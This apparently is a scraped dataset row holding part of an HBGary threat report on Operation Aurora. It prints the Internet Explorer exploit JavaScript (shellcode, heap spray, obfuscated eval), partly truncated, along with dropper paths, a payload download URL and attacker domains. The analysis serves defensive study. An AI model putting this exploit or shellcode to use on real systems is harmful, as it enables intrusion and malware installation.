text
stringlengths 4
429
|
---|
Operation Aurora was published in the public domain in early |
January 2010. Microsoft details the vulnerability in Security |
Bulletin MS10-002. Internet Explorer 5.01, Internet Explorer |
6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and |
Internet Explorer 8 (except Internet Explorer 6 for supported |
editions of Windows Server 2003) are affected. Exploit code |
analyzed by HBGary reveals that only Internet Explorer 6 |
was targeted during Operation Aurora. This vulnerability can |
be leveraged by attackers of varying skill levels due to the |
JAVASCRIPT EXPLOIT CODE |
<html> |
<head> |
<script> |
var sc = unescape( |
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8 |
db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u |
8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u308 |
SECTION REMOVED FOR SPACE... |
8%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342 |
%ucd8b%ub0be%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8 |
var sss = Array (826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, |
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, |
SECTION REMOVED FOR SPACE... |
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, |
735, 651, 427, 770, 301, 805, 693, 413, 875); |
var arr = new Array; |
for (var i = 0; i < sss.length; i ++) { |
arr[i] = String.fromCharCode (sss [i] / 7); |
var cc = arr.toString (); |
cc = cc.replace (/,/g, |
cc = cc.replace (/@/g, |
eval (cc); |
var x1 = new Array (); |
for (i = 0; i < 200; i ++) { |
x1 [i] = document.createElement ( |
COMMENT |
x1 [i].data = |
var e1 = null; |
function ev1 (evt) |
e1 = document.createEventObject (evt); |
document.getElementById ( |
).innerHTML = |
window.setInterval (ev2, 50); |
function ev2 () |
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u |
0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0 |
d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d |
for (i = 0; i < x1.length; i ++) { |
x1 [i].data = p; |
var t = e1.srcElement; |
</script> |
</head> |
<body> |
<span id= |
><IMG SRC= |
aaa.gif |
onload= |
ev1(event) |
width= |
height= |
></span> |
</body> |
</html> |
HB GARY THREAT REPORT: OPERATION AURORA |
public availability of the Metasploit module |
ie_aurora.rb |
The exploit code used by the original attackers was quickly |
improved and added to Metasploit thus greatly expanding the |
potential number of attackers and reliability of code. |
The JavaScript performs a heap spray attack and injects |
the embedded shellcode described below. The JavaScript |
exploits the vulnerability in Internet Explorer by copying, |
releasing, and then referencing a Document Object Model |
(DOM) element. |
JAVASCRIPT ARTIFACTS |
PATTERN |
Initial encrypted dropper download. |
Deleted file. |
C:\%appdata%\a.exe |
Decrypted dropper. Deleted file. |
C:\%appdata\b.exe |
JavaScript present in Internet Explorer |
memory space. |
<code listed above> |
Download URL present in internet |
history during memory analysis. |
http://demo1.ftpaccess.cc/ |
demo/ad.jpg |
Other domains associated |
with Aurora. |
sl1.homelinux.org |
360.homeunix.com |
ftp2.homeunix.com |
update.ourhobby.com |
blog1.servebeer.com |
The shellcode exists as a Unicode escaped variable (sc) |
in the malicious JavaScript listed below. Upon successful |
exploitation of Internet Explorer, the shellcode will download |
an obfuscated second stage executable from http://demo1. |
ftpaccess.cc/demo/ad.jpg which is the dropper. Note: these |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.